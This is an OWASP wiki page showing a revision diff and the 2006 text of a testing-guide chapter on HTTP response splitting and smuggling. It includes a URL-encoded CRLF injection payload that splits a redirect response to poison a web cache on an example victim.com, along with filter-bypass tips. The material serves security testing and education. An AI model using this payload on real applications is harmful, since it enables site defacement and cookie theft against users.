Difference between revisions of "Testing for HTTP Splitting/Smuggling (OWASP-DV-016)"

From OWASP
Jump to: navigation, search
m
Line 7: Line 7:
  
 
== Description of the Issue ==  
 
== Description of the Issue ==  
We analyze two different attacks that target specific HTTP headers: HTTP splitting and HTTP smuggling. The first one exploits a lack of input sanitization which allows an attacker to control to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages. The goal of the attack can vary from a cache
+
We will analyze two different attacks that target specific HTTP headers: HTTP splitting and HTTP smuggling. The first attack exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages. The goal of the attack can vary from a cache poisoning to cross site scripting. In the second attack, the attacker exploits the fact that some specially crafted HTTP messaged can be parsed and interpreted in different ways depending on the agent that receives them. HTTP smuggling requires some level of knowledge about the different agents that are handling the HTTP messages (web server, proxy, firewall) and therefore will be included only in the Gray Box testing section<br>
poisoning to cross site scripting. In the second attack, we exploit the fact that the same HTTP message can be parsed and interpreted in different ways depending on the agent that receives.
+
HTTP smuggling requires some level of knowledge about the different agents that are handling the HTTP messages (web server, proxy, firewall) and therefore will be included only in the Gray Box testing section<br>
+
  
== Black Box testing and example ==
+
== Black Box testing and Examples ==
 
===HTTP Splitting===
 
===HTTP Splitting===
Some web applications use part of the user input to generate the values of
+
Some web applications use part of the user input to generate the values of some headers of their responses. The most straightforward example is provided by redirections in which the target URL depends on some user submitted value. Let's say for instance that the user is asked to choose whether he/she prefers a standard or advanced web interface. Such choice will be passed as a parameter that will be used in the response header to trigger the redirection to the corrisponding page. More specifically, if the parameter 'interface' has the value 'advanced', the application will answer with the following:
some headers of their response. The most classic example is provided by
+
redirections in which the target URL depends on some user submitted value.
+
Let's say that the user is asked to choose whether she prefers a standard or
+
advanced interface. Such choice will be passed as a parameter that will be
+
used for a redirection to the corrisponding page. If the parameter, for
+
instance, has the value 'advanced', the application will answer with the
+
following:
+
 
<pre>
 
<pre>
 
HTTP/1.1 302 Moved Temporarily
 
HTTP/1.1 302 Moved Temporarily
Line 27: Line 18:
 
<snip>
 
<snip>
 
</pre>
 
</pre>
When receiving this message, the browser will ask for the page indicated in
+
When receiving this message, the browser will bring the user to the page indicated in the Location header. However, if the application does not filter the user input, it will be possible to insert in the 'interface' parameter the sequence %0d%0a, which represent the CRLF sequence that is used to separate different lines. At this point, we will be able to trigger a response that will be interpreted as two different responses by anybody who happens to parse it, for instance a web cache sitting between us and the application. This can be leveraged by an attacker to poison this web cache so that it will provide false content in all subsequent requests. Let's say that in our previous example the pen-tester passes the following data as the interface parameter:
the Location header. However, if the application does not filter the user
+
input, it is possible to insert the sequence %0d%0a, which represent the CRLF
+
sequence that is used to separate different lines, and use it to craft a
+
response that will be interpreted as two different responses by the target,
+
which for instance can be a web cache. This can be leveraged by an attacker to
+
poison this web cache so that it will provide false content (controlled by the
+
attacker) in all subsequent requests. Let's say that in our previous example
+
an attacker passes the following data as the interface parameter:
+
 
<pre>
 
<pre>
 
advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
 
advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Line 55: Line 38:
 
<other data>
 
<other data>
 
</pre>
 
</pre>
The web cache will see two different responses, so if the attacker sends a
+
The web cache will see two different responses, so if the attacker sends, immediately after the first request. a
second request asking for /index.html, the web cache will match this request
+
second one asking for /index.html, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to victim.com/index.html passing through that web cache
with the second response, so that all subsequent requests for http://victim.com/index.html passing through that web cache will
+
will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole Internet, if the web cache is a reverse proxy for the web application). Alternatively, the attacker could pass to those users a JavaScript snippet that would steal their cookies, mounting a Cross Site Scripting attack. Note that while the vulnerability is in the application, the target here are its users.
will receive the "system down" message. In this way, the attacker will have
+
effectively defaced the site.
+
  
Therefore, in order to look for this vulnerability, the tester needs to
+
Therefore, in order to look for this vulnerability, the tester needs to identify all user controlled input that influences one or more headers in the response, and check whether he/she can successfully inject a CR+LF sequence in it. The headers that are the most likely candidates for this attack are:
identify all user controlled input that influences one or more headers in the
+
response, and check whether he/she can successfully inject a CR+LF sequence in
+
it. The headers that are the most likely candidates for this attack are:
+
  
 
* Location
 
* Location
 
* Set-Cookie
 
* Set-Cookie
  
It must be noted that a successful exploitation of this vulnerability in a
+
It must be noted that a successful exploitation of this vulnerability in a real world scenario can be quite complex, as several factors must be taken into account:
real world scenario can be quite complex, as several factors must be taken
+
into account:
+
  
 +
# The pen-tester must properly set the headers in the fake response for it to be successfully cached (e.g.: a Last-Modified header with a date set in the future). He/she might also have to destroy previously cached versions of the target pagers, by issuing a preliminary request with "Pragma: no-cache" in the request headers
 
# The application, while not filtering the CR+LF sequence, might filter other characters that are needed for a successful attack (e.g.: "<" and ">"). In this case, the tester can try to use other encodings (e.g.: UTF-7)
 
# The application, while not filtering the CR+LF sequence, might filter other characters that are needed for a successful attack (e.g.: "<" and ">"). In this case, the tester can try to use other encodings (e.g.: UTF-7)
 +
# Some targets (e.g.: ASP) will URL-encode the path (e.g.: www.victim.com/redirect.asp) part of the Location header, making a CRLF sequence useless. However, they fail to encode the query section (e.g.: ?interface=advanced), meaning that a leading question mark is enough to bypass this problem
 
# Different targets can use different methods to decide when the first HTTP message ends and when the second starts. Some will use the message boundaries, as in the previous example. Others will allocate for each message a number of chunks of predetermined length: in this case, the second message will have to start exactly at the beginning of a chunk and this will require the tester to use padding between the two messages. Other targets will assume that different messages will be carried by different packets.
 
# Different targets can use different methods to decide when the first HTTP message ends and when the second starts. Some will use the message boundaries, as in the previous example. Others will allocate for each message a number of chunks of predetermined length: in this case, the second message will have to start exactly at the beginning of a chunk and this will require the tester to use padding between the two messages. Other targets will assume that different messages will be carried by different packets.
  
For a detailed discussion about this attacks, check the papers referenced at
+
For a more detailed discussion about this attack and other information about possible scenarios and applications, check the corresponding paper referenced at the bottom of this page
the bottom of this page
+
 
<br>
 
<br>
 
== Gray Box testing and example ==  
 
== Gray Box testing and example ==  

Revision as of 16:55, 4 December 2006

[Up]
OWASP Testing Guide v2 Table of Contents

Contents


Brief Summary

In this chapter we will illustrate examples of attacks that leverage specific features of the HTTP protocol, either by exploiting weaknesses of the web application or peculiarities in the way different agents interpret HTTP messages

Description of the Issue

We will analyze two different attacks that target specific HTTP headers: HTTP splitting and HTTP smuggling. The first attack exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages. The goal of the attack can vary from a cache poisoning to cross site scripting. In the second attack, the attacker exploits the fact that some specially crafted HTTP messaged can be parsed and interpreted in different ways depending on the agent that receives them. HTTP smuggling requires some level of knowledge about the different agents that are handling the HTTP messages (web server, proxy, firewall) and therefore will be included only in the Gray Box testing section

Black Box testing and Examples

HTTP Splitting

Some web applications use part of the user input to generate the values of some headers of their responses. The most straightforward example is provided by redirections in which the target URL depends on some user submitted value. Let's say for instance that the user is asked to choose whether he/she prefers a standard or advanced web interface. Such choice will be passed as a parameter that will be used in the response header to trigger the redirection to the corrisponding page. More specifically, if the parameter 'interface' has the value 'advanced', the application will answer with the following:

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
<snip>

When receiving this message, the browser will bring the user to the page indicated in the Location header. However, if the application does not filter the user input, it will be possible to insert in the 'interface' parameter the sequence %0d%0a, which represent the CRLF sequence that is used to separate different lines. At this point, we will be able to trigger a response that will be interpreted as two different responses by anybody who happens to parse it, for instance a web cache sitting between us and the application. This can be leveraged by an attacker to poison this web cache so that it will provide false content in all subsequent requests. Let's say that in our previous example the pen-tester passes the following data as the interface parameter:

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>

The resulting answer from the vulnerable application will therefore be the following:

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

<html>Sorry,%20System%20Down</html>
<other data>

The web cache will see two different responses, so if the attacker sends, immediately after the first request. a second one asking for /index.html, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to victim.com/index.html passing through that web cache will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole Internet, if the web cache is a reverse proxy for the web application). Alternatively, the attacker could pass to those users a JavaScript snippet that would steal their cookies, mounting a Cross Site Scripting attack. Note that while the vulnerability is in the application, the target here are its users.

Therefore, in order to look for this vulnerability, the tester needs to identify all user controlled input that influences one or more headers in the response, and check whether he/she can successfully inject a CR+LF sequence in it. The headers that are the most likely candidates for this attack are:

  • Location
  • Set-Cookie

It must be noted that a successful exploitation of this vulnerability in a real world scenario can be quite complex, as several factors must be taken into account:

  1. The pen-tester must properly set the headers in the fake response for it to be successfully cached (e.g.: a Last-Modified header with a date set in the future). He/she might also have to destroy previously cached versions of the target pagers, by issuing a preliminary request with "Pragma: no-cache" in the request headers
  2. The application, while not filtering the CR+LF sequence, might filter other characters that are needed for a successful attack (e.g.: "<" and ">"). In this case, the tester can try to use other encodings (e.g.: UTF-7)
  3. Some targets (e.g.: ASP) will URL-encode the path (e.g.: www.victim.com/redirect.asp) part of the Location header, making a CRLF sequence useless. However, they fail to encode the query section (e.g.: ?interface=advanced), meaning that a leading question mark is enough to bypass this problem
  4. Different targets can use different methods to decide when the first HTTP message ends and when the second starts. Some will use the message boundaries, as in the previous example. Others will allocate for each message a number of chunks of predetermined length: in this case, the second message will have to start exactly at the beginning of a chunk and this will require the tester to use padding between the two messages. Other targets will assume that different messages will be carried by different packets.

For a more detailed discussion about this attack and other information about possible scenarios and applications, check the corresponding paper referenced at the bottom of this page

Gray Box testing and example

Testing for Topic X vulnerabilities:
...
Result Expected:
...

References

Whitepapers


OWASP Testing Guide v2

Here is the OWASP Testing Guide v2 Table of Contents